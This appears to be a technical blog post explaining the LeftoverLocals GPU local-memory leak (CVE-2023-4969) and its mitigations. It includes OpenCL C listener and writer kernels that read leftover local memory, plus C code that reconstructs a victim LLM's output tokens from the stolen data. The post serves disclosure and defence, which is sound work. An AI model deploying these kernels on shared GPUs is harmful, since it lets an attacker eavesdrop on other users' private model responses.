
LeftoverLocals: A New Threat to GPU Security in AI Applications

Welcome back to The Final Hop! Today, we're taking a technical deep dive into a recent discovery in cybersecurity: LeftoverLocals. This vulnerability, found by Tyler Sorensen and Heidy Khlaaf of Trail of Bits, poses a significant threat to the security of AI applications, particularly large language models (LLMs), running on GPUs from Apple, Qualcomm, AMD, and Imagination. Let's dissect what LeftoverLocals is, how it works, and what mitigations are available.

What is LeftoverLocals?

Overview: LeftoverLocals is a vulnerability that allows an attacker to recover data from GPU local memory that was written by another process. It significantly undermines the security of GPU applications, particularly those running LLMs and other ML models. The vulnerability, tracked as CVE-2023-4969, was disclosed through a coordinated effort with the affected GPU vendors, led by the CERT Coordination Center.

Technical Details: LeftoverLocals leaks roughly 5.5 MB of residual data per GPU kernel invocation on an AMD Radeon RX 7900 XT; because a single LLM query launches many kernels, this adds up to about 181 MB per query. That is more than enough data to reconstruct an LLM response with high precision. The discovery highlights security risks in parts of the ML development stack that have not yet been rigorously reviewed by security experts.

How Does LeftoverLocals Work?

Exploitation Requirements: The attack requires co-residency, meaning the attacker runs as another application or user on the same shared machine as the victim. The attacker also needs the ability to launch GPU compute work through a framework such as OpenCL, Vulkan, or Metal. From there, the attacker reads data left behind in GPU local memory simply by writing a GPU kernel that dumps uninitialized local memory to a buffer the CPU can read, an operation that takes fewer than 10 lines of code.
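To make that concrete, here is a minimal sketch of such a dump kernel in OpenCL C, modeled on the researchers' description. LM_SIZE and the kernel name are illustrative placeholders rather than values from the actual proof of concept:

```c
// LM_SIZE is an illustrative size for the local-memory region being probed.
#define LM_SIZE 1024

// Listener-style dump kernel: declares a local-memory array, never writes to
// it, and copies whatever values are already there out to global memory so
// the CPU can read them back.
__kernel void listener(__global volatile int *dump) {
    __local volatile int lm[LM_SIZE];
    for (int i = get_local_id(0); i < LM_SIZE; i += get_local_size(0)) {
        dump[LM_SIZE * get_group_id(0) + i] = lm[i];
    }
}
```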

The Listener and Writer: The exploitation process involves two programs: a Listener and a Writer. The Listener launches a GPU kernel that reads from uninitialized local memory and stores the results in the global memory, accessible by the CPU. The Writer, on the other hand, writes a canary value to the local memory. The CPU programs for both Listener and Writer launch their respective kernels repeatedly, and if the Listener reliably reads the canary values, the platform is deemed vulnerable to LeftoverLocals.
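The dump kernel sketched above is essentially the Listener's GPU side. The Writer can be just as small; here is an illustrative OpenCL C version that fills local memory with an arbitrary canary value (the constant and LM_SIZE are placeholders, and the volatile qualifier discourages the compiler from removing stores to memory the kernel never reads back):

```c
#define LM_SIZE 1024          // must match the Listener's probe size
#define CANARY  0x1337beef    // arbitrary, easily recognizable marker value

// Writer: fills local memory with the canary so a Listener running later,
// as a different process, can tell whether the values survived.
__kernel void writer(void) {
    __local volatile int lm[LM_SIZE];
    for (int i = get_local_id(0); i < LM_SIZE; i += get_local_size(0)) {
        lm[i] = CANARY;
    }
}
```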

Listening to LLM Responses: On a multi-tenant GPU machine, an attacker can exploit LeftoverLocals to listen in on a victim's LLM responses. The attacker first fingerprints the victim's model by dumping local memory and identifying the telltale linear algebra operations and memory-layout patterns of the LLM architecture. The attacker then listens specifically for the execution of the model's output layer, recognized using the weights or layout patterns obtained earlier. Because the entire input to that layer can be stolen, the attacker can reproduce the final-layer computation and recover the model's output.
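To see why stealing the output layer's input is enough, consider an open-weight model: the output-layer weight matrix is public, so the attacker only has to redo one matrix-vector product and take the argmax (assuming greedy decoding, for simplicity) to recover the predicted token. The following plain-C sketch uses made-up names and toy sizes purely for illustration:

```c
#include <stddef.h>

// Illustrative sizes only; real LLMs have thousands of hidden dimensions
// and tens of thousands of vocabulary entries.
#define HIDDEN 8
#define VOCAB  16

// Given the hidden vector stolen from local memory and the model's known
// output-layer weights, recompute the logits and return the index of the
// most likely token, i.e. the token the victim's model produced.
size_t recover_token(const float hidden[HIDDEN],
                     const float weights[VOCAB][HIDDEN]) {
    size_t best = 0;
    float best_logit = -1e30f;
    for (size_t v = 0; v < VOCAB; v++) {
        float logit = 0.0f;
        for (size_t h = 0; h < HIDDEN; h++) {
            logit += weights[v][h] * hidden[h];  // one row of the matrix-vector product
        }
        if (logit > best_logit) {                // running argmax over the vocabulary
            best_logit = logit;
            best = v;
        }
    }
    return best;
}
```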

Mitigation Strategies

User Mitigations: Users can defend against LeftoverLocals by modifying the source code of all GPU kernels that use local memory. Before the kernel ends, GPU threads should clear any used local memory locations. Users should ensure the compiler doesn’t remove these memory-clearing instructions, which can be difficult to verify due to the lack of GPU binary analysis tools.
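As a rough sketch of what that mitigation looks like in an OpenCL C kernel, assuming a hypothetical local buffer called scratch of LM_SIZE elements (both placeholders): once the real work is done, the work-group synchronizes and then cooperatively zeroes the buffer before the kernel returns.

```c
#define LM_SIZE 1024   // illustrative size of the kernel's local buffer

// Hypothetical kernel showing the mitigation: after the real work is done,
// all threads in the work-group cooperatively zero the local buffer so no
// data is left behind for a later kernel to read.
__kernel void my_kernel(__global float *out) {
    __local volatile float scratch[LM_SIZE];

    // ... the kernel's normal computation using scratch goes here ...

    barrier(CLK_LOCAL_MEM_FENCE);   // wait until every thread is done with scratch
    for (int i = get_local_id(0); i < LM_SIZE; i += get_local_size(0)) {
        scratch[i] = 0.0f;          // volatile discourages the compiler from eliding these stores
    }
}
```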

Vendor Responses: Apple, AMD, and Qualcomm have acknowledged the vulnerability, with various responses and patching efforts underway. Apple has patched some devices, while AMD continues to investigate potential mitigation plans. Qualcomm has released a patch for some devices, but others may remain vulnerable.

Other Environments: Cloud providers and mobile devices present different risk profiles. Cloud GPU systems do not currently appear to be vulnerable, thanks to more conservative GPU virtualization technology, but on mobile devices LeftoverLocals can be exploited when a malicious listener app runs side-by-side with a victim app.

Conclusion

LeftoverLocals is a reminder of the inherent security risks in the rapidly evolving field of GPU-accelerated applications, especially in AI and machine learning. For developers, understanding and mitigating such vulnerabilities is crucial in ensuring the security of their applications. This discovery underscores the need for rigorous security reviews and updates in all layers of the ML development stack. As we continue to rely more on AI and machine learning, addressing vulnerabilities like LeftoverLocals becomes increasingly vital.

Stay tuned to The Final Hop for more in-depth analysis and updates on the latest developments in technology and cybersecurity. Your feedback is invaluable to us, so feel free to share your thoughts and questions!